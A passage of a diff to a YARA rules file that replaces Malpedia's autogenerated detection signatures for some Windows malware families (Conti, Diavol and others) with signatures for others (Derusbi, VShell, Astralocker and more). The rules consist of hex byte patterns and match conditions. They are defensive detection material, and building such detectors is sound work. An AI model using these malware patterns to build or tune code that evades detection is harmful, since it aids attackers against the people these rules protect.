-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.diavol_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vshell"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vshell_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "3e39473296ffc516b0ed9d4653cc00f465f30bb27ef43ae2429115fd3af11eb5"
+		logic_hash = "0b9171ca5e9865b14566a3ce59438d8b7cb591eb5aa3cd70720ec9582e22ec53"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123530,34 +123832,34 @@ rule MALPEDIA_Win_Diavol_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7532 8b85d0fbffff 50 6a00 6a01 ff15???????? 8bf0 }
-		$sequence_1 = { 32d2 eb16 83f975 7207 8945fc 8bd8 eb0a }
-		$sequence_2 = { 0fb7045e 83c40c 83f825 7416 8d8dfcfeffff }
-		$sequence_3 = { 741d 83f93f 7412 66837dfc2a }
-		$sequence_4 = { 57 e8???????? 8b4dfc 83c410 8bc7 5f 5e }
-		$sequence_5 = { ff15???????? 8bf0 89b5c0fbffff 83feff }
-		$sequence_6 = { e8???????? 83c40c 8b4dfc 5f 5e 33cd b001 }
-		$sequence_7 = { 33c0 85ff 7420 8b0d???????? 8bff 66833c413b }
-		$sequence_8 = { 85c0 0f8465ffffff 8d95f4efffff 2bd6 f685a4edffff10 8bc6 }
-		$sequence_9 = { 8945fc 6880000000 8d8578ffffff 6a00 50 }
+		$sequence_0 = { 885017 0fb6542465 440fb6442456 4401c2 885018 488d4b19 4889c3 }
+		$sequence_1 = { f20f59c8 66480f7ec8 e8???????? 488d0d89325500 48894c2478 4889842480000000 488b442468 }
+		$sequence_2 = { 48c1ff3f 4921f8 4a8d1c06 b908000000 4c89df 4889c6 4c89d0 }
+		$sequence_3 = { 746f 4883f813 7454 e8???????? 4889842498000000 48895c2460 90 }
+		$sequence_4 = { 7509 488d05ad5cb600 eb65 4883fe02 7509 488d058e5cb600 eb56 }
+		$sequence_5 = { 7462 6690 4180fbff 0f84f6000000 49bc9899999999999919 4c39e7 772f }
+		$sequence_6 = { e9???????? 488d842450010000 488d5c2454 b902000000 e8???????? 488b4c2478 4839cb }
+		$sequence_7 = { c3 488b9c24a0000000 488b842488010000 0f1f440000 e9???????? 440fb64c3c52 4131f1 }
+		$sequence_8 = { 88542475 440fb6842499000000 4488442474 440fb68c249a000000 44884c2473 440fb6942496000000 4488542472 }
+		$sequence_9 = { 7667 4881fa00100000 be00100000 4189d0 4c0f4fc6 90 4981f800100000 }
 
 	condition:
-		7 of them and filesize < 191488
+		7 of them and filesize < 39452672
 }
-rule MALPEDIA_Win_Rikamanu_Auto : FILE
+rule MALPEDIA_Win_Derusbi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "308aa7df-176c-53f5-8487-211055f7d5b3"
+		id = "c096fedf-ff02-5515-aa84-dda61fd1b242"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rikamanu_auto.yar#L1-L282"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.derusbi_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "d4697a7a9a9db5141a7716ea23027d53a2dc30b33c7526980666f737aa001510"
+		logic_hash = "caf9d1cd989612f714b35d25a26a8b4ab8e67beec50b5a767b0d4e5f975c75e0"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -123569,52 +123871,32 @@ rule MALPEDIA_Win_Rikamanu_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 6a14 ff15???????? a801 }
-		$sequence_1 = { 50 ff15???????? 8b35???????? 3d80969800 }
-		$sequence_2 = { 33c0 663bcb 0f95c0 a3???????? }
-		$sequence_3 = { 80c120 888820ad4000 eb1f 83f861 7213 83f87a 770e }
-		$sequence_4 = { 59 50 8d85e8faffff 50 ff35???????? }
-		$sequence_5 = { 85f6 7419 0fb6da f683a1a7400004 }
-		$sequence_6 = { c3 0fb6442404 8a4c240c 8488a1a74000 751c 837c240800 }
-		$sequence_7 = { 8d8de4fdffff 51 e8???????? 8b8de4fdffff 8b35???????? 8d95ccfdffff }
-		$sequence_8 = { 8d74242c b8???????? 8a10 8aca 3a16 751c 3acb }
-		$sequence_9 = { 8b7d0c 85db 0f84b2000000 85ff 0f84aa000000 8d85a4fdffff }
-		$sequence_10 = { 8bc3 8bcb c1f805 83e11f 8b0485e0b84000 }
-		$sequence_11 = { 85c0 7457 68???????? 56 ffd5 }
-		$sequence_12 = { 6810270000 ff15???????? 8b85e4fdffff 8d8dccfdffff 51 8d9588fdffff 52 }
-		$sequence_13 = { 5d c20800 8b55e8 6a00 }
-		$sequence_14 = { 888808972400 40 ebe6 ff35???????? ff15???????? 85c0 }
-		$sequence_15 = { 8dbc2430010000 83c9ff f2ae f7d1 2bf9 8bf7 }
-		$sequence_16 = { ffd3 55 55 8d4c2444 55 }
-		$sequence_17 = { ff15???????? a3???????? 3bc3 7530 }
-		$sequence_18 = { 8b35???????? 68???????? ffd6 8be8 83fdff 750b }
-		$sequence_19 = { 6a00 68???????? 8b442418 6a03 }
-		$sequence_20 = { 0fb6da f683a1a7400004 7406 8816 }
-		$sequence_21 = { 7373 8bc8 8bf0 c1f905 83e61f 8d3c8de0b84000 c1e603 }
-		$sequence_22 = { 8a8160204100 8802 5b 5d c3 }
-		$sequence_23 = { a1???????? 0f45c6 a3???????? ebcf 83f802 }
-		$sequence_24 = { 50 53 6800130000 ff15???????? 5b }
-		$sequence_25 = { f682a1a7400004 740c ff01 85f6 }
-		$sequence_26 = { 52 6a01 53 53 e8???????? 8b95e0fdffff }
-		$sequence_27 = { 7410 8088????????20 8a9405ecfcffff ebe3 80a020ad400000 40 }
-		$sequence_28 = { 68???????? e8???????? 8b3d???????? 59 59 85c0 751b }
-		$sequence_29 = { 8d8914982400 5a 668b31 668930 }
+		$sequence_0 = { ff15???????? 48 48 7436 48 742c }
+		$sequence_1 = { ffb5f4fbffff ffd6 85c0 7461 b800010000 8985e4fbffff 8985e8fbffff }
+		$sequence_2 = { 53 be???????? 8dbda8f1ffff 50 f3a5 e8???????? 899d28f2ffff }
+		$sequence_3 = { 8b800c010000 c3 83790405 750e 83790800 7408 8b81a0000000 }
+		$sequence_4 = { 89442434 e8???????? 39442434 7467 68a4000000 ff15???????? 8bf0 }
+		$sequence_5 = { 8d85b4fdffff 53 50 c685fcfeffff00 c6857cffffff00 c6857cfeffff00 ffd6 }
+		$sequence_6 = { 51 ffb5dcf9ffff 8d85f4fdffff 50 ff15???????? 33c0 }
+		$sequence_7 = { 8db405aff7ffff 68???????? 56 ff15???????? 56 ffd7 8b8d9cf3ffff }
+		$sequence_8 = { 50 ff15???????? 59 59 6a43 58 6689442414 }
+		$sequence_9 = { 50 ff15???????? c70424???????? 33f6 56 6801001f00 ff15???????? }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Kegotip_Auto : FILE
+rule MALPEDIA_Win_Atmspitter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "600762c6-ac4d-5eb5-bbbf-0bef37409a30"
+		id = "a7fa682f-eefe-55e1-939b-4455645ebe46"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kegotip_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.atmspitter_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "6330aef57e16076515b4a4781ca5f76d2c7b12c38d9df7aca1927a38f8ab1a7a"
+		logic_hash = "0ed0ab3302f4e8054faec9b20c1025a14f4da75cd75a5c59684b771cac871b40"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123628,34 +123910,34 @@ rule MALPEDIA_Win_Kegotip_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 6801000080 ff15???????? 8985ecfeffff }
-		$sequence_1 = { 0fbe940dd6feffff 83fa5c 750e 8b85d4feffff c68405d6feffff00 8d8dd8feffff }
-		$sequence_2 = { 3b4514 7304 33c0 eb58 c745fc00000000 c745f800000000 }
-		$sequence_3 = { 52 ff15???????? 83bd6cfeffff00 7502 eb36 8b8560feffff }
-		$sequence_4 = { 898da8feffff 8995acfeffff 8b85acfeffff 3b45fc 7214 770b 8b8da8feffff }
-		$sequence_5 = { ff15???????? 83f803 7402 ebc2 6a00 6a04 8b45dc }
-		$sequence_6 = { 7412 0fbe4508 83f823 7409 c745fc00000000 eb07 }
-		$sequence_7 = { 32c0 e9???????? 8d85d8feffff 50 6804010000 ff15???????? }
-		$sequence_8 = { ff15???????? c645ff01 8b45f0 50 ff15???????? }
-		$sequence_9 = { c745f400000000 6a00 8d55f4 52 6a00 6a00 6a01 }
+		$sequence_0 = { 33c0 40 5f 5e c3 8324f5f0cb400000 }
+		$sequence_1 = { 8bc1 c1f805 8bf1 83e61f 8d3c8560da4000 8b07 c1e606 }
+		$sequence_2 = { 8d4c2420 8d8424c8000000 51 89442438 c744243400100000 ff15???????? }
+		$sequence_3 = { 897b04 c7430801000000 e8???????? 6a06 89430c 8d4310 8d8984c84000 }
+		$sequence_4 = { 5d c3 8b5c2420 33c0 89442450 89442454 89442458 }
+		$sequence_5 = { 8bc8 83e01f c1f905 c1e006 03048d60da4000 eb02 8bc2 }
+		$sequence_6 = { 0f854a020000 66837c245207 0f853e020000 8d942480000000 52 ff15???????? 3d09030000 }
+		$sequence_7 = { a3???????? a1???????? c705????????4b3a4000 8935???????? }
+		$sequence_8 = { 7402 ffd0 8345e404 ebe6 c745e060914000 817de064914000 7311 }
+		$sequence_9 = { e8???????? 83c404 8d442420 50 895c2424 c744242857000000 ff15???????? }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Conti_Auto : FILE
+rule MALPEDIA_Win_Quarterrig_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0b096496-c6ee-577a-814c-51565da6533c"
+		id = "768adc6e-04ee-5553-a73f-cf738ca33079"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.conti"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.conti_auto.yar#L1-L249"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quarterrig"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.quarterrig_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "dcbcb23c478cd81647ea44a976b8893f9822f8475b35052b849cd9e3172bedaa"
+		logic_hash = "b7e9c1f7a0f9288f7f968855b7e176a67e0d0fef09a3da04bc264465377e4dae"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -123667,50 +123949,32 @@ rule MALPEDIA_Win_Conti_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a06 8d7601 0fb6c0 83e839 }
-		$sequence_1 = { 57 bf0e000000 8d7101 8d5f71 }
-		$sequence_2 = { 803900 7530 53 56 57 bf0e000000 }
-		$sequence_3 = { 0f1f4000 8a07 8d7f01 0fb6c0 b92a000000 2bc8 }
-		$sequence_4 = { 753f 53 bb0e000000 57 8d7e01 }
-		$sequence_5 = { 8975fc 803e00 7541 53 bb0a000000 }
-		$sequence_6 = { 6a00 6a00 6800100000 68???????? }
-		$sequence_7 = { 57 bf0a000000 8d7101 8d5f75 }
-		$sequence_8 = { e8???????? 85c0 7508 6a01 ff15???????? }
-		$sequence_9 = { 50 6a20 ff15???????? 68???????? ff15???????? 68???????? }
-		$sequence_10 = { 8b4d08 e8???????? 6a00 ff15???????? 33c0 }
-		$sequence_11 = { 3d00005000 7605 b800005000 6a00 8d4c2418 }
-		$sequence_12 = { 3cff 0f859d000000 807f0125 0f8593000000 }
-		$sequence_13 = { 8bb6007d0000 85f6 75ef 6aff 6a01 }
-		$sequence_14 = { ff15???????? 89460c ff15???????? 8bc8 8b460c }
-		$sequence_15 = { ffd0 85c0 7519 c705????????0a000000 }
-		$sequence_16 = { 6aff 6a01 8d4108 50 }
-		$sequence_17 = { ff15???????? ff75f4 ff15???????? ff75f0 ff15???????? 5e }
-		$sequence_18 = { 7519 c705????????0a000000 e9???????? b801000000 }
-		$sequence_19 = { 3ce9 7412 3cff 0f859d000000 }
-		$sequence_20 = { 48894e08 4863c8 488d1c4b e8???????? }
-		$sequence_21 = { e8???????? 33c0 e9???????? 488bc8 48899c24a8010000 }
-		$sequence_22 = { 0f8ef5000000 49895b18 498973d0 be00005000 }
-		$sequence_23 = { c7442420000000f0 4c8d45a1 33d2 488bcf ffd0 85c0 }
-		$sequence_24 = { e8???????? 33d2 33c9 ffd0 8bf8 }
-		$sequence_25 = { e8???????? 33d2 41b8107d0000 488bc8 }
-		$sequence_26 = { 42884c0501 49ffc0 4983f80c 72af }
-		$sequence_27 = { 2bc8 884c3c21 48ffc7 4883ff04 }
+		$sequence_0 = { e9???????? 488b8a38000000 e9???????? 488b8a40000000 4883c118 e9???????? 488b8a38000000 }
+		$sequence_1 = { 488d4c2428 e8???????? 4c8b00 8ad3 488bc8 41ff5040 }
+		$sequence_2 = { 65488b042558000000 ba04000000 488b0cc8 8b040a 3905???????? 7f19 488d0580080600 }
+		$sequence_3 = { 4a8d0c37 eb0b 0fb607 48ffc7 c644042001 483bf9 75f0 }
+		$sequence_4 = { 488b0cc8 8b040a 3905???????? 7f1e 488d0576ef0500 488b4c2440 }
+		$sequence_5 = { 41b840000000 458d78d0 418bd7 488d4d28 e8???????? 448bc0 488d55e0 }
+		$sequence_6 = { e8???????? 488bd0 4438700a 7429 498bfe 408acf }
+		$sequence_7 = { 488d15fad00200 488d0dd32c0500 e8???????? 84c0 7543 448b0d???????? 4c8d05bc2c0500 }
+		$sequence_8 = { 488bd6 488d4c2460 e8???????? 90 488b5808 48897808 488b4c2468 }
+		$sequence_9 = { 4c8d2518470300 895c2420 81fb80000000 0f8dd7000000 4863fb 498b34fc 4885f6 }
 
 	condition:
-		7 of them and filesize < 520192
+		7 of them and filesize < 971776
 }
-rule MALPEDIA_Win_Unidentified_068_Auto : FILE
+rule MALPEDIA_Win_8T_Dropper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1ce41a1d-9111-5664-971b-18b33f290c67"
+		id = "485513e6-6a30-5542-9db5-771c168cddae"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_068"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_068_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.8t_dropper_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "cf7d5521a90e4f10a4d7ed99e1e2829b2e957d2aba56d598bf0190ab6bc75eb5"
+		logic_hash = "ce9c22a4da7356dd0a0bfe7a1e7d1abeadd8c256121840ed85ba440a85beb469"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123724,34 +123988,34 @@ rule MALPEDIA_Win_Unidentified_068_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 8bd1 8b4a08 3b4a04 730d 8b02 8a0401 }
-		$sequence_1 = { 8b0f e8???????? 8d7f04 83eb01 75f1 6808030000 56 }
-		$sequence_2 = { 8d45b4 c645fc02 50 8d45cc 50 8bc1 }
-		$sequence_3 = { 894de8 0fb6c8 8b0c8d00e24500 8bc3 c1e808 0fb6c0 330c8500de4500 }
-		$sequence_4 = { 83f808 73ad 5f 5e 8b4d08 33c0 8b9380000000 }
-		$sequence_5 = { 5d c3 55 8bec 81ec14020000 8365f800 8d85ecfdffff }
-		$sequence_6 = { 8b4514 85c0 7410 3918 7505 394804 7407 }
-		$sequence_7 = { 8bd0 c70424???????? e8???????? 59 50 8d4dd0 c645fc08 }
-		$sequence_8 = { 3955f0 1bc0 f7d8 40 03c1 6683470203 }
-		$sequence_9 = { c70485????????58fe4400 40 a3???????? c3 b9???????? e8???????? 68???????? }
+		$sequence_0 = { 83c9ff f2ae f7d1 49 c6440c0c52 }
+		$sequence_1 = { 83c40c c3 8b442408 83f801 }
+		$sequence_2 = { 8d942410010000 6804010000 52 68???????? ff15???????? 8d842410010000 68???????? }
+		$sequence_3 = { 8bc6 5f 5e 5b c9 c3 ff35???????? }
+		$sequence_4 = { 49 51 68???????? 6a02 50 8b442418 }
+		$sequence_5 = { 6801000080 ff15???????? bf???????? 83c9ff 33c0 }
+		$sequence_6 = { 683f000f00 50 52 6801000080 ff15???????? bf???????? 83c9ff }
+		$sequence_7 = { 51 ff15???????? 8d942410010000 6804010000 52 68???????? }
+		$sequence_8 = { 83c408 85f6 741b 56 6800700000 6a01 }
+		$sequence_9 = { 7559 8b4c2408 51 ff15???????? 8d942410010000 6804010000 }
 
 	condition:
-		7 of them and filesize < 862208
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Vyveva_Auto : FILE
+rule MALPEDIA_Win_Nachocheese_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "609ee890-2ca7-5a62-be35-cd1b7bd5751c"
+		id = "119ab577-2997-5077-8fbd-28bff11c20d6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vyveva"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vyveva_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nachocheese"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nachocheese_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "0673ae4749420e7fc0134b23031a9015b50b7275847c92099461dcf3a81aa83d"
+		logic_hash = "cadb77319f92fe40994b6aeeeca327d5d465905297aa3f5228d474dfd2f50f6d"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -123763,32 +124027,38 @@ rule MALPEDIA_Win_Vyveva_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 58 50 5f 5f 50 5f 8b4c2430 }
-		$sequence_1 = { 7404 894424fc 83ec04 2bc1 58 75e2 8d4c2418 }
-		$sequence_2 = { 51 89442414 8bce e8???????? 8b942430020000 8d44240c 6a04 }
-		$sequence_3 = { ffb5ac000000 58 85c0 0f85f2010000 68???????? ff15???????? 50 }
-		$sequence_4 = { 8b4c2410 6a00 51 6a03 6a00 }
-		$sequence_5 = { 8d8c2468010000 50 51 6a41 e8???????? 83c404 ffd0 }
-		$sequence_6 = { 8d4c2418 c644243800 e8???????? 8d4c2424 57 51 8d4d14 }
-		$sequence_7 = { 83ec04 33db 8d5c194c 83eb4c c74424fc0c000000 83ec04 }
-		$sequence_8 = { 5b 53 59 59 53 51 5b }
-		$sequence_9 = { 8bce e8???????? 8b942430020000 8d44240c 6a04 50 56 }
+		$sequence_0 = { e8???????? 8945fc eb34 83f817 7532 8b7710 }
+		$sequence_1 = { 3d2cc00000 7f18 3d2bc00000 7d1b }
+		$sequence_2 = { 2bfa 8d47fd 3901 8901 }
+		$sequence_3 = { 56 e8???????? 50 e8???????? 6a0a 6a4e }
+		$sequence_4 = { 7305 83c303 eb1c 81fb00000100 }
+		$sequence_5 = { 50 32db ff15???????? 85c0 7473 8b55f4 }
+		$sequence_6 = { c785e0f9ffff02000000 ff15???????? 3b05???????? 740a a3???????? }
+		$sequence_7 = { 3d9f000000 7e0d 33c0 c3 }
+		$sequence_8 = { 53 33db 8d4df4 51 66c1c008 }
+		$sequence_9 = { 33c0 c3 05d13fffff 83f801 }
+		$sequence_10 = { 33c8 894710 8b4708 33c1 }
+		$sequence_11 = { b810270000 6806100000 8945fc 8945f4 }
+		$sequence_12 = { 3d2bc00000 7d1b 3d9c000000 7c07 3d9f000000 }
+		$sequence_13 = { 40 50 e8???????? b9???????? 83c424 }
+		$sequence_14 = { 8bcf 51 6804010000 68???????? eb38 8dbc24a0010000 8bce }
+		$sequence_15 = { 7305 83c302 eb29 81fb00010000 7305 83c303 }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 1064960
 }
-rule MALPEDIA_Win_Karma_Auto : FILE
+rule MALPEDIA_Win_Astralocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dbba8d60-5e3c-5b62-b524-df57562af200"
+		id = "44156298-552d-5dee-871e-065e8177c7e9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karma"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.karma_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.astralocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.astralocker_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "3819fc1d726604395f257c41732abcfd39c86d6c5f38e2d6dd6e88cb0f6eea5a"
+		logic_hash = "a5647fc347475c8a37d856421ffd217ff32a1a45599157161a2296f0a4c958b5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123802,32 +124072,32 @@ rule MALPEDIA_Win_Karma_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33f6 0fb74102 83c102 8bd0 6685c0 75da }
-		$sequence_1 = { c745dc33000000 c745e032000000 c745e42d000000 c745e862000000 c745ec79000000 c745f074000000 }
-		$sequence_2 = { 0fb7040a 8d4902 668901 6685c0 75f1 8d8df4fdffff }
-		$sequence_3 = { 8d55b8 50 8bca e8???????? 8d45b8 }
-		$sequence_4 = { 85c0 750c 68???????? ffd6 a3???????? 8b15???????? 85d2 }
-		$sequence_5 = { 8b4c2438 e8???????? 83c410 6a00 6a00 }
-		$sequence_6 = { 750d 83e820 8bc8 85c0 7fed 85c9 }
-		$sequence_7 = { 0f1f00 8d4341 c745fa3a005c00 668945f8 33c0 668945fe 8d45f8 }
-		$sequence_8 = { 750c 40 83f808 72f4 0f84b0000000 56 8bd6 }
-		$sequence_9 = { 7f0c 8b442418 3bf8 0f8224ffffff 8b7c2410 ff742434 6a00 }
+		$sequence_0 = { 891401 89740104 b808000000 6bc800 8b5508 }
+		$sequence_1 = { 51 e8???????? 83c408 8945ec 8955f0 }
+		$sequence_2 = { 50 8b0c0a 51 e8???????? 83c408 }
+		$sequence_3 = { 57 b808000000 6bc80a 8b5508 33c0 33f6 89040a }
+		$sequence_4 = { ba08000000 6bc20a 8b4d08 33d2 }
+		$sequence_5 = { 51 8b14d0 52 e8???????? 83c408 8945f4 8955f8 }
+		$sequence_6 = { 6bc20a 8b4d08 33d2 33f6 891401 }
+		$sequence_7 = { 8b4cd004 51 8b14d0 52 e8???????? 83c408 8945f4 }
+		$sequence_8 = { b808000000 6bc80a 8b5508 33c0 33f6 89040a }
+		$sequence_9 = { b808000000 6bc80a 8b5508 33c0 33f6 }
 
 	condition:
-		7 of them and filesize < 49208
+		7 of them and filesize < 191488
 }
-rule MALPEDIA_Win_Arefty_Auto : FILE
+rule MALPEDIA_Win_Mortis_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a1bbf58c-af9c-5d64-b893-96f60da58ce9"
+		id = "795aebf5-a47f-5442-8167-7bfad8d933e5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.arefty_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mortis"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mortis_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "fde5f4282a78a6517cf5f33df8600bda217d95924465f99b86aed788930f75c3"
+		logic_hash = "aab52de125cd03f4e28839f7c33e3b05d109e77cc3c335759a1d782c52454873"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123841,32 +124111,32 @@ rule MALPEDIA_Win_Arefty_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 ff15???????? 680000a000 e8???????? }
-		$sequence_1 = { 50 53 ff15???????? 680000a000 e8???????? }
-		$sequence_2 = { 50 680000a000 57 53 ff15???????? 85c0 }
-		$sequence_3 = { 8b07 68???????? 6a03 8d04b0 50 }
-		$sequence_4 = { 50 8b07 68???????? 6a03 8d04b0 50 }
-		$sequence_5 = { 50 53 ff15???????? 680000a000 }
-		$sequence_6 = { 57 e8???????? 83c404 83fbff 7407 53 }
-		$sequence_7 = { 0fb6041e 50 8b07 68???????? 6a03 }
-		$sequence_8 = { ff15???????? 680000a000 e8???????? 8bf8 }
-		$sequence_9 = { 680000a000 57 53 ff15???????? }
+		$sequence_0 = { 75e5 bf08000000 8b0c1f c1e102 81f900100000 7212 8b50fc }
+		$sequence_1 = { 8b4690 8b4004 c7443090ecc24300 8b4690 8b4804 8d41e8 8944318c }
+		$sequence_2 = { 2bc2 83c0fc 83f81f 0f872c050000 51 52 e8???????? }
+		$sequence_3 = { c1e908 6a0a 8854072a 8b049d201f4400 884c072b 8b049d201f4400 59 }
+		$sequence_4 = { 740f 83f8fe 740a 6bfa38 033c8d201f4400 f6472d01 7418 }
+		$sequence_5 = { e8???????? 8d8564ffffff 50 e8???????? 83c40c e8???????? 0f57c0 }
+		$sequence_6 = { 0f8238feffff 8b55d4 41 8bc2 81f900100000 7210 8b50fc }
+		$sequence_7 = { 2bc1 85c9 0f84c7000000 0fbe0e 40 03c2 894de8 }
+		$sequence_8 = { e8???????? c645fc10 0f57c0 6a04 }
+		$sequence_9 = { eb34 b916000000 3bf1 0f42f1 8d4e01 }
 
 	condition:
-		7 of them and filesize < 237568
+		7 of them and filesize < 577536
 }
-rule MALPEDIA_Win_Billgates_Auto : FILE
+rule MALPEDIA_Win_Apocalipto_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ce6a49fc-09dc-5429-91ef-444e27e6a6e2"
+		id = "58f415e5-91b6-56af-81ea-f9ae50f28789"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.billgates_auto.yar#L1-L111"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.apocalipto_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "7ac006802cc67c455b1cfb751cff616e1942e0354815f2ae842e0537d44fc0dd"
+		logic_hash = "48ade2c833b72b6d2d3dc07dbbdbc3c6fed84013a5bea316066eb8c372c170b2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123880,32 +124150,32 @@ rule MALPEDIA_Win_Billgates_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3c78 7404 3c58 7507 b802000000 eb02 }
-		$sequence_1 = { 740c 3c11 7408 3c22 }
-		$sequence_2 = { 3c10 740c 3c11 7408 }
-		$sequence_3 = { 3c58 7507 b802000000 eb02 }
